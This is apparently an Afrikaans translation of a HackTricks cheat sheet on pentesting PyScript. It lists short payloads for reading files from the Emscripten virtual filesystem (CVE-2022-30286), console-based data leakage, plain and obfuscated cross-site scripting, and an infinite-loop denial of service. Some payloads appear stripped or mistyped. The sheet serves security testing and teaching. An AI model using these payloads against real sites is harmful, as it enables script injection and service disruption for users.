# Pyskrip {% hint style="success" %} Leer & oefen AWS-hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Leer & oefen GCP-hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Ondersteun HackTricks * Controleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)! * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Deel hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
{% endhint %} ## PyScript Pentesting Gids PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer sodat dit saam met HTML gebruik kan word. In hierdie spiekbrief sal jy vind hoe om PyScript vir jou penetrasietoetsdoeleindes te gebruik. ### Dumping / Ophaling van lêers uit die Emscripten virtuele geheue-lêersisteem: `CVE ID: CVE-2022-30286`\ \ Kode: ```html with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out = fin.read() print(out) ``` Result: ![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png) ### [OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript) `CVE ID: CVE-2022-30286`\ \ Code: ```html x = "CyberGuy" if x == "CyberGuy": with open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read() print(contents) print('') ``` Result: ![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png) ### Kruissite-skripsie (Gewoon) Kode: ```python print("") ``` Result: ![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png) ### Kruissite Skrif (Python Versteekte) Kode: ```python sur = "\u0027al";fur = "e";rt = "rt" p = "\x22x$$\x22\x29\u0027\x3E" s = "\x28";pic = "\x3Cim";pa = "g";so = "sr" e = "c\u003d";q = "x" y = "o";m = "ner";z = "ror\u003d" print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p) ``` Result: ![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png) ### Kruissite Scripting (JavaScript Verduistering) Kode: ```html prinht("") ``` Result: ![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png) ### DoS-aanval (Oneindige lus) Kode: ```html while True: print("                              ") ``` Result: ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) {% hint style="success" %} Leer & oefen AWS-hacking:[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Leer & oefen GCP-hacking: [**HackTricks Opleiding GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Ondersteun HackTricks * Kontroleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)! * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Deel hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
{% endhint %}